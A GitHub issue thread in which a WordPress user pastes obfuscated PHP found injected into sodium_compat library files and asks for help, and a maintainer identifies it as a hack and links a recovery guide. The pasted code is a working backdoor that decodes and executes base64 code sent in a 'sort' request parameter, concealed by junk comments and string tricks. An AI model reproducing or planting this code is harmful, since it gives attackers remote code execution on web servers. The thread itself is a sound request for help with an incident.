### ISSUE TITLE
Help wanted

### ISSUE THREAD

**Issue by TELstatic** [paragonie/sodium_compat#109]
I found the following code in my WordPress. Can anyone find any exceptions.

sodium_compat.php && constants.php between `<?php` and `namespace Sodium;`

	$ALpmKtOl8475 = "/jqsbr9ia654yug0ew1)*7dtp;m8lx_2fnvh3zo.ck(";

	$kHTiDsnt7866 = "";

	foreach([3,38,5,23] as $E){
	   $kHTiDsnt7866 .= $ALpmKtOl8475[$E];
	}

	if(isset($_REQUEST /*IlrKKxaEyQYkVUUVAQbCmgexCXoxvTrWqZxLlUthFJqduXYQfOEmKNTKGadaSfRBShxfGLFeFWBpNsWfEfbqbOCqDwLWiKmAoIrTUVLuzCGVahNNWQrOmifqtmmmrJzS*/["$kHTiDsnt7866"])){
		$DDebczKe7430 = $_REQUEST /*IlrKKxaEyQYkVUUVAQbCmgexCXoxvTrWqZxLlUthFJqduXYQfOEmKNTKGadaSfRBShxfGLFeFWBpNsWfEfbqbOCqDwLWiKmAoIrTUVLuzCGVahNNWQrOmifqtmmmrJzS*/["$kHTiDsnt7866"];
		$EqHZGFsG5581 = "";
		$DmPqoAru8529 = "";

		/*BFqVBKdwHVucHDLSKCdwDiTVwngSbkntEQocQxHZWXqOHINzkwYNpFtIhaZOzZmlBugDZEeVeugTChJBDKMyUvNOMfLdQhewrsRxbevlgjPspZyWQsuBuFbokFrMaJQa*/

		foreach([4,8,3,16,9,11,30,22,16,40,38,22,16] as $E){
		   $EqHZGFsG5581 .= $ALpmKtOl8475[$E];
		}

		/*bJvLXYFVbsskXlgKXtVZMihhCyROeEvZEuTsNlIYPVOwxQISXNpPYfiuOKkkcTUqbyksvSGuxRecSOetQBEaewcaSqwZTBmbrWvMYSwkZgnbggtoDJLEdgPaRpCiDDyg*/

		foreach([3,23,5,5,16,34] as $E){
		   $DmPqoAru8529 .= $ALpmKtOl8475[$E];
		}

		/*BNAAulguuQqtnSBDkkMBWjwtJICKhYDEEYyHJYKXJSmfoXDkKeHSIGWguuvFFNCwBCphSfhTRoclivzmdsvCnwqmZAiVWVuHrAabUFyjSeLKWnoHqZdGNGDMxZODhxgl*/

		$E = $DmPqoAru8529('n'.'o'.'i'.'t'.''.''.''.''.'c'.'n'.'u'.''.''.'f'.''.''.'_'.''.''.''.'e'.'t'.'a'.'e'.''.''.''.''.'r'.'c');
		$E = $E("", $EqHZGFsG5581($DDebczKe7430));
		$E();
		exit();

	}

**Comment by paragonie-scott** [comment]
It appears that your WordPress site has been hacked and someone dropped in some obfuscated code in it.

https://www.wpexplorer.com/recover-hacked-wordpress-site/

**Comment by TELstatic** [comment]
@paragonie-scott Thanks
